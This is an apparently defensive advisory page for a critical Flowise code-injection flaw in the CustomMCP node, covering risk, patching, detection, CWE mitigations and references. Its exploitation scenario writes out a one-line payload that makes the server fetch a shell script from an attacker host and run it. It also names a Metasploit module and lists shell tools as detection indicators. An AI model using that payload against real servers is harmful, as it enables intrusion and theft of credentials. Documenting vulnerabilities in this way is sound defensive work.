CVE-2025-59528: Flowise: Unauthenticated RCE via MCP config injection
CRITICAL PoC AVAILABLE NUCLEI TEMPLATE CISA: ATTENDFlowise 3.0.5 contains a maximum-severity (CVSS 10.0) unauthenticated remote code execution flaw: the CustomMCP node passes user-supplied configuration strings directly into JavaScript's `Function()` constructor with zero sanitization, granting attackers full Node.js runtime access including `child_process` and `fs` modules. With no privileges required, no user interaction needed, and a public proof-of-concept already available, any internet-exposed Flowise instance should be treated as actively compromised until patched. Flowise has 16 prior CVEs in the same package, and this class of vulnerability — server-side JavaScript injection in LLM orchestration tooling — is a particularly high-value target because these platforms typically run with broad filesystem and network access in AI production environments. Upgrade immediately to Flowise 3.0.6; if patching is blocked, restrict access to the CustomMCP node configuration endpoint via network controls and audit process execution logs for anomalous child_process spawning.
What is the risk?
Maximum exploitability: CVSS 10.0 with network vector, low complexity, no privileges, no user interaction, and changed scope. The Function() constructor pattern is a well-understood exploit primitive — no specialized knowledge required to weaponize. Public PoC lowers the bar to script-kiddie level. Not yet in CISA KEV but given the trivial exploitation and critical severity, KEV addition is plausible. AI orchestration platforms like Flowise typically run in privileged positions within the data pipeline — with access to LLM API keys, database credentials, and internal services — dramatically amplifying post-exploitation blast radius beyond the vulnerable host itself.
What systems are affected?
How severe is it?
What is the attack surface?
What should I do?
4 steps-
Immediate
Upgrade Flowise to version 3.0.6 which patches the Function() constructor injection.
-
If unable to patch
Block external access to the Flowise API endpoint (default port 3000) at the network/WAF layer; restrict CustomMCP node usage via Flowise's built-in authorization controls if configured.
-
Detection
Monitor for anomalous child process spawning from the Flowise Node.js process (e.g.,
sh,bash,curl,wget,ncas child processes). Review Node.js application logs for unusualFunction()constructor invocations. Search SIEM for outbound connections from the Flowise host to non-standard endpoints. -
Post-patch
Rotate all credentials (LLM API keys, DB passwords, cloud tokens) accessible from the Flowise server environment — assume compromise if the server was internet-exposed on 3.0.5.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
How many AI incidents are linked? (2)
Threat actors are actively exploiting a critical remote code execution vulnerability (CVE-2025-59528) in Flowise, an open-source platform for building LLM-based applications, to execute arbitrary code on affected systems.
Threat actors are actively exploiting CVE-2025-59528, a CVSS 10.0 code injection flaw in the Flowise AI agent builder, with over 12,000 internet-exposed instances at risk of remote code execution.
AI Threat Alert incident classification, derived from public security reporting. Each item links to its original source.
Frequently Asked Questions
What is CVE-2025-59528?
Flowise 3.0.5 contains a maximum-severity (CVSS 10.0) unauthenticated remote code execution flaw: the CustomMCP node passes user-supplied configuration strings directly into JavaScript's `Function()` constructor with zero sanitization, granting attackers full Node.js runtime access including `child_process` and `fs` modules. With no privileges required, no user interaction needed, and a public proof-of-concept already available, any internet-exposed Flowise instance should be treated as actively compromised until patched. Flowise has 16 prior CVEs in the same package, and this class of vulnerability — server-side JavaScript injection in LLM orchestration tooling — is a particularly high-value target because these platforms typically run with broad filesystem and network access in AI production environments. Upgrade immediately to Flowise 3.0.6; if patching is blocked, restrict access to the CustomMCP node configuration endpoint via network controls and audit process execution logs for anomalous child_process spawning.
Is CVE-2025-59528 actively exploited?
A weaponized Metasploit module (exploit/multi/http/flowise_js_rce) exists for CVE-2025-59528, meaning the exploit is point-and-click and the risk of opportunistic exploitation is high.
How to fix CVE-2025-59528?
1. **Immediate**: Upgrade Flowise to version 3.0.6 which patches the Function() constructor injection. 2. **If unable to patch**: Block external access to the Flowise API endpoint (default port 3000) at the network/WAF layer; restrict CustomMCP node usage via Flowise's built-in authorization controls if configured. 3. **Detection**: Monitor for anomalous child process spawning from the Flowise Node.js process (e.g., `sh`, `bash`, `curl`, `wget`, `nc` as child processes). Review Node.js application logs for unusual `Function()` constructor invocations. Search SIEM for outbound connections from the Flowise host to non-standard endpoints. 4. **Post-patch**: Rotate all credentials (LLM API keys, DB passwords, cloud tokens) accessible from the Flowise server environment — assume compromise if the server was internet-exposed on 3.0.5.
What systems are affected by CVE-2025-59528?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM orchestration pipelines, MCP-connected AI tool chains, multi-model AI workflows.
What is the CVSS score for CVE-2025-59528?
CVE-2025-59528 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 90.18%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0049 Exploit Public-Facing Application AML.T0050 Command and Scripting Interpreter AML.T0053 AI Agent Tool Invocation AML.T0072 Reverse Shell AML.T0083 Credentials from AI Agent Configuration Compliance Controls Affected
What are the technical details?
Original Advisory
Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. This issue has been patched in version 3.0.6.
Exploitation Scenario
An attacker identifies an internet-exposed Flowise instance via Shodan/Censys (Flowise has a recognizable web UI fingerprint). They send a crafted POST request to the node configuration API endpoint (no authentication required in default deployments), embedding a JavaScript payload in the `mcpServerConfig` field — e.g., `require('child_process').exec('curl attacker.com/shell.sh | bash')`. The `convertToValidJSONString` function passes this directly to `new Function(userInput)()`, executing it with the Node.js process's full privileges. The attacker establishes a reverse shell, then systematically harvests all environment variables (LLM API keys, database URLs), reads the Flowise flows database to enumerate connected AI services, and uses the compromised server as a pivot point into the organization's internal AI infrastructure.
Weaknesses (CWE)
CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
- [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
- [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H References
- github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts Product
- github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts Product
- github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts Product
- github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/nodes/index.ts Product
- github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/routes/node-load-methods/index.ts Product
- github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/nodes/index.ts Product
- github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6 Release
- github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p Exploit Vendor
- github.com/fkie-cad/nvd-json-data-feeds Exploit
- github.com/nomi-sec/PoC-in-GitHub Exploit
Timeline
Scanner Template Available
A Nuclei vulnerability scanner template exists for this CVE. You can scan your infrastructure for this vulnerability immediately.
View template on GitHubnuclei -t http/cves/2025/CVE-2025-59528.yaml -u https://target.example.com Related Vulnerabilities
CVE-2025-71338 10.0 Flowise: unauthenticated file write enables RCE
Same package: flowise CVE-2025-61913 9.9 Flowise: path traversal in file tools leads to RCE
Same package: flowise CVE-2026-40933 9.9 Flowise: RCE via MCP stdio command injection
Same package: flowise CVE-2026-46442 9.9 Flowise: sandbox escape enables authenticated RCE
Same package: flowise CVE-2026-56274 9.9 Flowise: RCE via MCP server command validation bypass
Same package: flowise